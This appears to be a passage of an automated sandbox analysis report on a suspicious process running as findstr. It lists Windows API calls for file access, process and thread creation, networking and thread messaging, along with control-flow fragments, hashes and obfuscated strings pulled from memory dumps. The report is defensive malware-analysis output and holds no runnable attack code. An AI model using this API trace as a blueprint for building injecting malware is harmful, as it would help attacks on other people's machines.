                            • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 006E7EB3
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 2e40ff50122b8e0142a13011b578975d71dfa10266604aed4942e60d3e816b6c
                            • Instruction ID: 461043d41571f4935da8928c1413dd96422002407d95f676e678d9f8342d08eb
                            • Opcode Fuzzy Hash: 2e40ff50122b8e0142a13011b578975d71dfa10266604aed4942e60d3e816b6c
                            • Instruction Fuzzy Hash: 6731C0B5A01649AFCB54DF99D881EEEB7B9AF8C314F10821DF918A3340D730A951CBA4
                            APIs
                            • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 006E7FF8
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: f604e84cb98246461505d61f8bac19005c11d48fe1166f6f44754967ebc154b1
                            • Instruction ID: 98b8b6009828563266f47ef268cd2a0b1e575fe9ff1a27e8fe7cfc3bf25bdc8f
                            • Opcode Fuzzy Hash: f604e84cb98246461505d61f8bac19005c11d48fe1166f6f44754967ebc154b1
                            • Instruction Fuzzy Hash: 5731D5B5A00248AFCB14DF99D881EEFB7B9EF8C314F10821DF908A7241D770A9118BA4
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteFile
                            • String ID:
                            • API String ID: 4033686569-0
                            • Opcode ID: b325f9c68976874d70c3d730cd674c32c6df172f102c009210c1a8c47f6ab067
                            • Instruction ID: e54c8be61c53b0a27f339caeeb30437e07d48a989ffdadb938609026d1883201
                            • Opcode Fuzzy Hash: b325f9c68976874d70c3d730cd674c32c6df172f102c009210c1a8c47f6ab067
                            • Instruction Fuzzy Hash: 7D01C071641344BFD220EA6ADC46FEB73AEDF85714F00450DFA099B281D771BA1187E9
                            APIs
                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 006E80C7
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                            • Instruction ID: e835abe737af81c89962f18f4df2e28d79ff0dd64274988baa4b3c147c80a9ec
                            • Opcode Fuzzy Hash: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                            • Instruction Fuzzy Hash: 2FE04F352002447BC210AA5ADC05FDB775EDFC6724F018419FA08A7242C671B91186B4
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 53ef36f3eef23330da26bcb5b0e85a288824c55a6c56b44fec0dabef4b27a982
                            • Instruction ID: 56bcd7924ae982e8643ff4ec87cb32f6f0c70b3d2ae8a4dc90e08c1565d0de90
                            • Opcode Fuzzy Hash: 53ef36f3eef23330da26bcb5b0e85a288824c55a6c56b44fec0dabef4b27a982
                            • Instruction Fuzzy Hash: 5290023160580022A54071588884547400597E1381B55C011E1428554C8A148A565365
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 75a676fa29ffb393331846423af217354c451d3fc21c53bdf8864f2c133c4b47
                            • Instruction ID: cf8a82584ea20095192d8dbb446d445271d23390086302f5a58a82f7eeb96cb8
                            • Opcode Fuzzy Hash: 75a676fa29ffb393331846423af217354c451d3fc21c53bdf8864f2c133c4b47
                            • Instruction Fuzzy Hash: 9E900231242441626945B1588404507400697E12C1795C012A2418950C85269956D625
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e125456d9f9c061bb35b25054a0880edcb75bad8fb4a1d15f6ebd5705d78f939
                            • Instruction ID: 05160477800016ea69983d1e37eb331c1f1ecc487d159a8ee14fa83699d1e997
                            • Opcode Fuzzy Hash: e125456d9f9c061bb35b25054a0880edcb75bad8fb4a1d15f6ebd5705d78f939
                            • Instruction Fuzzy Hash: 6690023130140013E540715894186074005D7E2381F55D011E1418554CD91589565226
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 24c107af05a89e0c8ba1ef72bde300c9cb871a159e8972e148679b026fb223e5
                            • Instruction ID: 83ad994df1d576fbcd889b4595168b13d055329363f72550c2c0aafc0b53e923
                            • Opcode Fuzzy Hash: 24c107af05a89e0c8ba1ef72bde300c9cb871a159e8972e148679b026fb223e5
                            • Instruction Fuzzy Hash: 1790023921340012E5807158940860B000587D2282F95D415A1019558CC91589695325

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 342 6d0b17-6d0b1c 343 6d0b5e 342->343 344 6d0b1e-6d0b3b 342->344 345 6d0b3d-6d0b54 344->345 346 6d0ba8-6d0baf 344->346 345->343 347 6d0bb5-6d0bf7 call 6d4530 call 6c1410 call 6e1350 346->347 348 6d0bb0 call 6eaa10 346->348 355 6d0bf9-6d0c08 PostThreadMessageW 347->355 356 6d0c17-6d0c1d 347->356 348->347 355->356 357 6d0c0a-6d0c14 355->357 357->356
                            APIs
                            • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 006D0C04
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: H0840I45$H0840I45
                            • API String ID: 1836367815-3713557624

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 358 6d0b56-6d0b5c 359 6d0b5e 358->359 360 6d0b97-6d0bf7 call 6ea000 call 6eaa10 call 6d4530 call 6c1410 call 6e1350 358->360 371 6d0bf9-6d0c08 PostThreadMessageW 360->371 372 6d0c17-6d0c1d 360->372 371->372 373 6d0c0a-6d0c14 371->373 373->372
                            APIs
                            • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 006D0C04
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: H0840I45$H0840I45
                            • API String ID: 1836367815-3713557624

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 374 6d0b88-6d0bf7 call 6ea000 call 6eaa10 call 6d4530 call 6c1410 call 6e1350 386 6d0bf9-6d0c08 PostThreadMessageW 374->386 387 6d0c17-6d0c1d 374->387 386->387 388 6d0c0a-6d0c14 386->388 388->387
                            APIs
                            • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 006D0C04
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: H0840I45$H0840I45
                            • API String ID: 1836367815-3713557624

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 389 6d0b90-6d0bf7 call 6ea000 call 6eaa10 call 6d4530 call 6c1410 call 6e1350 401 6d0bf9-6d0c08 PostThreadMessageW 389->401 402 6d0c17-6d0c1d 389->402 401->402 403 6d0c0a-6d0c14 401->403 403->402
                            APIs
                            • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 006D0C04
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: H0840I45$H0840I45
                            • API String ID: 1836367815-3713557624
                            APIs
                            • Sleep.KERNELBASE(000007D0), ref: 006E2CDC
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: net.dll$wininet.dll
                            • API String ID: 3472027048-1269752229
                            APIs
                            • WSAStartup.WS2_32(00000202,?), ref: 006D1A44
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Startup
                            • String ID: \
                            • API String ID: 724789610-2967466578
                            APIs
                            • WSAStartup.WS2_32(00000202,?), ref: 006D1A44
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Startup
                            • String ID: \
                            • API String ID: 724789610-2967466578
                            APIs
                            • RtlAllocateHeap.NTDLL(006D1799,?,006E4B0F,006D1799,006E4727,006E4B0F,?,006D1799,006E4727,00001000,?,?,006E9C50), ref: 006E83EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID: 'Gn
                            • API String ID: 1279760036-3614514410
                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 006E843F
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID: 2m
                            • API String ID: 3298025750-977460488
                            APIs
                            • SetErrorMode.KERNELBASE(00008003,?,?,006D1A80,Gnn,006E4727,?), ref: 006D7C91
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID: 'Gn
                            • API String ID: 2340568224-3614514410
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 006DECC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Initialize
                            • String ID: @J7<
                            • API String ID: 2538663250-2016760708
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 006DECC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Initialize
                            • String ID: @J7<
                            • API String ID: 2538663250-2016760708
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 006D45A2
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            APIs
                            • WSAStartup.WS2_32(00000202,?), ref: 006D1A44
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Startup
                            • String ID:
                            • API String ID: 724789610-0
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 006D45A2
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            APIs
                            • CreateProcessInternalW.KERNELBASE(006D1030,006D1058,006D0E30,00000000,006D7E13,00000010,006D1058,?,?,00000044,006D1058,00000010,006D7E13,00000000,006D0E30,006D1058), ref: 006E84F0
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateInternalProcess
                            • String ID:
                            • API String ID: 2186235152-0
                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006C9812
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006C9812
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006C9812
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            APIs
                            • GetFileAttributesW.KERNELBASE ref: 006D7E7A
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3792083516.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3300000_findstr.jbxd
                            Similarity
                            • API ID:
                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                            • API String ID: 0-3754132690
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3792083516.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3300000_findstr.jbxd
                            Similarity
                            • API ID:
                            • String ID: "">7$43 ;$9={r$;&}g$;=<}$>7}c$>;97$>;97$>>3}$ae|g$c`r$c|`r$e|br$e|ga$g|br$}kga
                            • API String ID: 0-3696260499
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            Strings
                            • Execute=1, xrefs: 02FB4713
                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02FB4655
                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 02FB4787
                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02FB4725
                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02FB4742
                            • ExecuteOptions, xrefs: 02FB46A0
                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02FB46FC
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID:
                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                            • API String ID: 0-484625025
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-$0$0
                            • API String ID: 1302938615-699404926
                            Strings
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02FB02BD
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02FB02E7
                            • RTL: Re-Waiting, xrefs: 02FB031E
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                            • API String ID: 0-2474120054
                            Strings
                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02FB7B7F
                            • RTL: Resource at %p, xrefs: 02FB7B8E
                            • RTL: Re-Waiting, xrefs: 02FB7BAC
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 0-871070163
                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FB728C
                            Strings
                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02FB7294
                            • RTL: Resource at %p, xrefs: 02FB72A3
                            • RTL: Re-Waiting, xrefs: 02FB72C1
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 885266447-605551621
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-
                            • API String ID: 1302938615-2137968064
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$@
                            • API String ID: 0-1194432280
                            APIs
                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 02FCCFBD
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: CallFilterFunc@8
                            • String ID: @$@4_w@4_w
                            • API String ID: 4062629308-713214301
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3792083516.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3300000_findstr.jbxd
                            Similarity
                            • API ID:
                            • String ID: "5$7}1<$_ ib$ib!Y
                            • API String ID: 0-3399154490